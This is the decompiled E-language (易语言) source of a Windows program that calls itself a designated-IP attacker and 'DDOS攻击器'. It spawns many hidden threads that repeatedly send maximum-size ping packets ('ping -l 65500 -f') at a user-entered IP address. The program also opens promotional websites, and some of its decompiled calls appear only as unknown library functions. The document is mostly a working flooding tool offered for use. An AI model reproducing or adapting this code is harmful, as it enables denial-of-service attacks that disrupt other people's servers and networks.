 ' 文件类型：Windows窗口程序

 ' 程序名称：反恐部落专用指定IP攻击器
 ' 程序描述：指定IP攻击器
 ' 程序作者：利哥QQ:1747423426
 ' 邮政编码：
 ' 联系地址：
 ' 联系电话：
 ' 传真号码：
 ' 电子信箱：
 ' 主页地址：
 ' 版权声明：
 ' 版本号：1.0
 ' 创建号：0.0

窗口 _启动窗口 ' 在程序启动后自动调入本窗口
    左边 = 50
    顶边 = 50
    宽度 = 256
    高度 = 146
    鼠标指针 = { 0,0,0,0 }
    标记 = “”
    可视 = 真
    禁止 = 假
    边框 = 2
    底图方式 = 1
    底色 = 0 '  0x0
    最大化按钮 = 假
    最小化按钮 = 真
    控制按钮 = 真
    位置 = 1
    可否移动 = 真
    背景音乐播放次数 = 0
    回车下移焦点 = 假
    Esc键关闭 = 真
    F1键打开帮助 = 假
    帮助标志值 = 0
    在任务栏中显示 = 真
    随意移动 = 假
    外形 = 0
    总在最前 = 假
    保持标题栏激活 = 假
    窗口类名 = “”
    底图 =  ' 空
    图标 =  ' 空
    背景音乐 =  ' 空
    标题 = “绝缘科技IP攻击器”
    帮助文件名 = “”





 ' 所需要的支持库：
 ' krnln d09f2340818511d396f6aaf844c7e325 5 0 系统核心支持库
 ' EThread 5F99C1642A2F4e03850721B4F5D7C3F8 2 0 多线程支持库
 ' HtmlView 5014D8FA6DCA40b68FA626D8183666EB 2 0 超文本浏览框支持库
 ' xplib 7F54B9CE8887428dBA9CEEB94CEF4C72 2 0 XP风格界面库
 ' iext 27bb20fdd3e145e4bee3db39ddd6e64c 2 0 扩展界面支持库一
 ' eAPI F7FC1AE45C5C4758AF03EF19F18A395D 3 0 应用接口支持库





.窗口程序集 窗口程序集1, , , 

.程序集变量 成功次数, 整数型, , , 
.程序集变量 失败次数, 整数型, , , 
.程序集变量 是否攻击, 逻辑型, , , 
.程序集变量 销毁线程, 整数型, , , 
.程序集变量 guanyu, 逻辑型, , , 
.子程序 __启动窗口_创建完毕, 空白型, , 
未知支持库函数_56 (“www.xlliang.icoc.cn”)
未知支持库函数_0 (1)
赋值 (guanyu, 真)

.子程序 _调节器1_调节钮被按下, 空白型, , 
.参数 按钮值, 整数型, , 

.如果 (等于 (按钮值, 1))
    赋值 (.内容, 到文本 (相加 (到数值 (.内容), 1)))
.否则
    .如果真 (不等于 (到数值 (.内容), 1))
        赋值 (.内容, 到文本 (相减 (到数值 (.内容), 1)))
    .如果真结束
    
.如果结束


.子程序 _按钮开始攻击_被单击, 空白型, , 
.局部变量 计次, 整数型, , , 

赋值 (是否攻击, 真)
.计次循环首 (到数值 (.内容), 计次)
    未知支持库函数_0 (&攻击线程, 10)
    赋值 (.禁止, 真)
    赋值 (.禁止, 假)
    赋值 (.禁止, 真)
    赋值 (.禁止, 真)
.计次循环尾 ()

.子程序 攻击线程, 空白型, , 
.如果真 (等于 (是否攻击, 假))
    赋值 (销毁线程, 相加 (销毁线程, 1))
    赋值 (_启动窗口., 相加 (“开启线程”, .内容, “ ”, “关闭线程”, 到文本 (销毁线程)))
    .如果真 (等于 (销毁线程, 到数值 (.内容)))
        赋值 (_启动窗口., “DDOS攻击器”)
        赋值 (.禁止, 假)
        赋值 (.禁止, 假)
        赋值 (.禁止, 假)
        赋值 (销毁线程, 0)
    .如果真结束
    返回 ()
.如果真结束

.如果 (运行 (相加 (“ping ”, .内容, “-l 65500 -n 1 -f”), 真, #隐藏窗口))
     ' -l 65500 -n 1 -f    65500是数据包大小  可改为0-65500之间的数
    赋值 (成功次数, 相加 (成功次数, 1))
.否则
    赋值 (失败次数, 相加 (失败次数, 1))
.如果结束
.如果真 (等于 (是否攻击, 真))
    赋值 (_启动窗口., 相加 (“成功”, 到文本 (成功次数), “ ”, “失败”, 到文本 (失败次数)))
.如果真结束
攻击线程 ()



.子程序 _按钮停止攻击_被单击, 空白型, , 
赋值 (_启动窗口., “请等待线程结束”)
赋值 (是否攻击, 假)
赋值 (.禁止, 真)

.子程序 _按钮关于_被单击, 空白型, , 
.判断开始 (等于 (guanyu, 真))
    赋值 (_启动窗口., 240)
    赋值 (guanyu, 假)
.默认
    赋值 (_启动窗口., 142)
    赋值 (guanyu, 真)
.判断结束


.子程序 _按钮上传_被单击, 空白型, , 
未知支持库函数_56 (“http://www.wangpanwo.com/account.htm?action=register&uid=20”)


 ' 不属于任何一个程序集、类模块的函数：
